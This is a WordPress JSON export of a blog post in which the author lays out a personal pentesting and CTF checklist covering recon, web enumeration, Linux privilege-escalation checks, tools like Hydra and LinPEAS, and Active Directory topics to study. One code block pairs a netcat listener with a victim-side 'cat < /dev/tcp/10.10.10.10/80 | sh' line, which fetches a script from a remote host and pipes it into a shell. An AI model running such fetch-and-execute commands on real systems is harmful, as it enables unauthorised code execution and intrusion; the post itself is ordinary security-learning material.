{"id":353,"date":"2025-07-29T07:44:43","date_gmt":"2025-07-29T07:44:43","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=353"},"modified":"2025-07-29T07:44:43","modified_gmt":"2025-07-29T07:44:43","slug":"building-my-personal-pentesting-checklist","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=353","title":{"rendered":"Building My Personal Pentesting Checklist"},"content":{"rendered":"\n<p>To create a better workflow during CTFs and pentests, I wanted to build a checklist to bring more <strong>consistency<\/strong> to my process. It also gives me insight into the simple things that are easy to overlook. In this post, I\u2019ll walk through the different phases of my checklist and share some of the thoughts behind it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial recon<\/h2>\n\n\n\n<p>For most CTFs, initial recon is pretty straightforward: we start with an <code>nmap<\/code> scan and investigate based on open ports. But in pentesting (especially in black-box scenarios), we often don\u2019t get much to begin with. That\u2019s why I added a few more steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Gather IP ranges<\/li>\n\n\n\n<li>WHOIS Lookup<\/li>\n\n\n\n<li>DNS enumeration<\/li>\n\n\n\n<li>Google dorking<\/li>\n<\/ul>\n\n\n\n<p>These steps help make sure I don\u2019t miss any publicly available information before diving into the target itself.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Enumerating &amp; Vulnerabilty scanning<\/h2>\n\n\n\n<p>In a real pentest, <strong>time is limited<\/strong>, so automation becomes important. I\u2019m starting to explore tools like <strong>Nessus<\/strong> and <strong>OpenVAS<\/strong> for this. But since most of my time goes into CTFs, I\u2019ve been mostly doing manual testing \u2014 especially on webapps, which I really enjoy. Here are my go-to web enumeration steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Check for <code>robots.txt<\/code> and <code>sitemap.xml<\/code><\/li>\n\n\n\n<li>Use <strong>Gobuster<\/strong> to find hidden subdirectories<\/li>\n\n\n\n<li>Use <strong>ffuf<\/strong> to brute-force subdomains<\/li>\n\n\n\n<li>Inspect page source code and JavaScript<\/li>\n\n\n\n<li>Look for injection points (SQL, XSS, etc.)<\/li>\n\n\n\n<li>Test upload functions<\/li>\n\n\n\n<li>Check for log poisoning opportunities<\/li>\n<\/ul>\n\n\n\n<p>For non-web services (from the <code>nmap<\/code> scan), I often use <a href=\"https:\/\/book.hacktricks.wiki\/en\/index.html\">HackTricks<\/a> as a guide to help me enumerate further and understand common attack paths.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial access<\/h2>\n\n\n\n<p>Once I gain access, things shift \u2014 we look for <strong>privilege escalation paths<\/strong>. On webapps, this can mean trying to reset credentials or exploit functionality. On Linux, I split my checks into <strong>global<\/strong> and <strong>user-level<\/strong> steps:<\/p>\n\n\n\n<p><strong>Global checks:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Kernel version: <code>uname -a<\/code><\/li>\n\n\n\n<li>Sudo rights: <code>sudo -l<\/code><\/li>\n\n\n\n<li>Check for vulnerable <code>sudo<\/code> versions<\/li>\n\n\n\n<li>Password reuse across users<\/li>\n\n\n\n<li>Cronjobs running as root<\/li>\n\n\n\n<li>World-writable files\/scripts<\/li>\n\n\n\n<li>Run LinPEAS:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-bd472f5235262c18ee8dcd577ede433c\"><code>sudo nc -q 5 -lvnp 80 &lt; linpeas.sh #Host\ncat &lt; \/dev\/tcp\/10.10.10.10\/80 | sh #Victim<\/code><\/pre>\n\n\n\n<p><strong>User-level checks<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Check user group memberships<\/li>\n\n\n\n<li>Look for password reuse<\/li>\n\n\n\n<li>Check environment variables<\/li>\n\n\n\n<li>Look for SSH keys<\/li>\n\n\n\n<li>Check for hidden files<\/li>\n\n\n\n<li>Check SUID binaries:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-ecccb319dd10cba6f0354caf859ad639\"><code>find \/ -perm -4000 -type f 2&gt;\/dev\/null<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Tools that keep coming back<\/h3>\n\n\n\n<p>Certain tools keep proving their value in almost every challenge or test:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Burp Suite \/ ZAP<\/strong> \u2013 for web proxying and testing<\/li>\n\n\n\n<li><strong>Gobuster \/ ffuf<\/strong> \u2013 for brute-force discovery<\/li>\n\n\n\n<li><strong>Hydra<\/strong> \u2013 for login brute-forcing<\/li>\n\n\n\n<li><strong>LinPEAS<\/strong> \u2013 for privilege escalation<\/li>\n\n\n\n<li><strong>John \/ Hashcat<\/strong> \u2013 for password cracking<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Topics I Want to Explore<\/h2>\n\n\n\n<p>As I continue to grow, I\u2019ve realized there are still many areas in pentesting I haven\u2019t explored yet. A few that are on my radar:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Network pentesting<\/li>\n\n\n\n<li>Security evasion techniques<\/li>\n\n\n\n<li>Automated vulnerability pipelines<\/li>\n\n\n\n<li>Social Engineering &amp; phishing<\/li>\n<\/ul>\n\n\n\n<p>The field is massive \u2014 becoming a true all-rounder may not be realistic quickly, but I believe it\u2019s achievable with consistent progress. One step at a time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">A Note on Active Directory (AD)<\/h3>\n\n\n\n<p>Right now, my checklist is mostly focused on web and Linux environments, simply because that\u2019s where I\u2019ve gained the most hands-on experience through CTFs and internal tests. <strong>But Active Directory is a huge part of real-world pentesting<\/strong>, especially in internal assessments. So even though I don\u2019t have a full workflow for AD yet, it\u2019s an area I\u2019m actively planning to dive into.<\/p>\n\n\n\n<p>Some key topics I want to explore in this space:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Basic AD enumeration (users, groups, shares)<\/li>\n\n\n\n<li>Kerberos attacks (e.g. Kerberoasting, AS-REP roasting)<\/li>\n\n\n\n<li>Pass-the-Hash \/ Pass-the-Ticket<\/li>\n\n\n\n<li>BloodHound &amp; SharpHound analysis<\/li>\n\n\n\n<li>Abuse of misconfigured ACLs<\/li>\n<\/ul>\n\n\n\n<p>I\u2019ll update this post and my GitBook once I\u2019ve built a more complete checklist and gained real practice with these.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Whats next?<\/h2>\n\n\n\n<p>I know many of these items are basic \u2014 and that\u2019s <strong>exactly the point<\/strong>. Basics get skipped more often than you&#8217;d think. Missing them can mean missing the entire attack path. I\u2019ll be sharing my checklist soon, probably in the form of a <strong>GitBook<\/strong> or similar platform. I\u2019m also working on collecting my CEH and other study notes in the same place. It&#8217;s a work in progress, but I hope it will help others too. The checklist will grow over time as my experience does. This post is just a snapshot of where I\u2019m at now \u2014 and that\u2019s perfectly fine.<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>To create a better workflow during CTFs and pentests, I wanted to build a checklist to bring more consistency to my process. It also gives me insight into the simple things that are easy to overlook. In this post, I\u2019ll walk through the different phases of my checklist and share some of the thoughts behind [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[7,17],"tags":[],"class_list":["post-353","post","type-post","status-publish","format-standard","hentry","category-realworld","category-tooling"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/353","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=353"}],"version-history":[{"count":5,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions"}],"predecessor-version":[{"id":359,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/353\/revisions\/359"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=353"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=353"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=353"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}